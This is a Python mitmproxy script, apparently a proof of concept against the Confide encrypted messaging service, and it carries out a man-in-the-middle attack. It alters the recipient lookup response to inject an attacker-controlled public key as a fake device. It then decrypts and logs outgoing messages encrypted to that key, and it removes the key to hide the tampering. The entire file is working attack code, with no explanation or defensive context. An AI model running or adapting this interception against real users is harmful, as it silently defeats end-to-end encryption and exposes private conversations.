import base64
import binascii
import json

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from mitmproxy import ctx
from mitmproxy.http import HTTPFlow


def aes_cbc_decrypt(message: bytes, key: bytes, initialization_vector: bytes) -> bytes:
    cipher = Cipher(algorithms.AES(key),
                    mode=modes.CBC(initialization_vector),
                    backend=default_backend())
    decryptor = cipher.decryptor()
    unpadder = padding.PKCS7(128).unpadder()

    plaintext = unpadder.update(decryptor.update(message) + decryptor.finalize())
    plaintext += unpadder.finalize()
    return plaintext


def ec_unserialize_public_key(compressed_point: bytes) -> ec.EllipticCurvePublicKey:
    assert compressed_point[0] & 0xfe == 2

    curve_a = -3
    curve_b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
    curve_p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff

    point_x = int.from_bytes(compressed_point[1:1+32], "big")
    point_y2 = (pow(point_x, 3, curve_p) + curve_a * point_x + curve_b) % curve_p
    point_y = pow(point_y2, (curve_p + 1) // 4, curve_p)

    if compressed_point[0] & 1 == 0:
        point_y = (curve_p - point_y) % curve_p
    public_numbers = ec.EllipticCurvePublicNumbers(point_x, point_y, ec.SECP256R1())
    return public_numbers.public_key(default_backend())


def ec_serialize_public_key(public_key: ec.EllipticCurvePublicKey) -> bytes:
    public_numbers = public_key.public_numbers()
    pub_x, pub_y = public_numbers.x, public_numbers.y
    if pub_y & 1:
        return b"\x03" + int.to_bytes(pub_x, 32, "big")
    else:
        return b"\x02" + int.to_bytes(pub_x, 32, "big")


class ConfideIntercepter(object):
    def __init__(self):
        # generate escrow key which will be added in the user profile
        self.escrow_private_key = ec.generate_private_key(ec.SECP256R1(), default_backend())
        public_key = binascii.hexlify(
            ec_serialize_public_key(self.escrow_private_key.public_key()))
        self.escrow_key = public_key.decode("utf-8").upper()

    def response(self, flow: HTTPFlow) -> None:
        """
        Inject escrow key when a client requests the profile of a recipient.
        """
        if flow.request.url == "https://confideapi.com/users/lookup":
            user_profile = json.loads(flow.response.text)
            user_profile["User"]["Installations"].append(
                {"InstallationId": 666,
                 "PublicKey": self.escrow_key})
            flow.response.text = json.dumps(user_profile)

    def request(self, flow: HTTPFlow) -> None:
        """
        Intercept messages sent by the client. Look if the message has been encrypted for the
        escrow recipient and decrypt message.
        """
        if flow.request.url == "https://confideapi.com/v1/threads/send.json":
            message = json.loads(flow.request.text)
            conversation_keys = message["conversationKeys"]

            # message does not contain escrow key
            if self.escrow_key not in conversation_keys:
                return

            # load sender public key
            sender_key = message["senderKey"]

            sender_public_key = ec_unserialize_public_key(binascii.unhexlify(sender_key))

            # compute public key from secret exponent
            shared_secret = self.escrow_private_key.exchange(ec.ECDH(), sender_public_key)
            digest = hashes.Hash(hashes.SHA1(), backend=default_backend())
            digest.update(shared_secret)
            message_key = digest.finalize()[:16]

            # decrypt message encryption key
            encrypted_key = base64.b64decode(conversation_keys[self.escrow_key])
            initialization_vector, payload = encrypted_key[:16], encrypted_key[16:]
            message_key = aes_cbc_decrypt(payload, message_key, initialization_vector)

            # decrypt message
            initialization_vector, encryption_key = message_key[:16], message_key[16:]
            encrypted_text = base64.b64decode(message["text"])
            plaintext_message = aes_cbc_decrypt(encrypted_text, encryption_key,
                                                initialization_vector)

            ctx.log.info("Intercepted message for {}".format(
                ", ".join(str(user_id) for user_id in message["userIds"])))
            ctx.log.info("-" * 80)
            ctx.log.info(plaintext_message.decode("utf-8"))
            ctx.log.info("-" * 80)

            # remove escrow key
            message["conversationKeys"].pop(self.escrow_key)
            flow.request.text = json.dumps(message)


def start():
    return ConfideIntercepter()
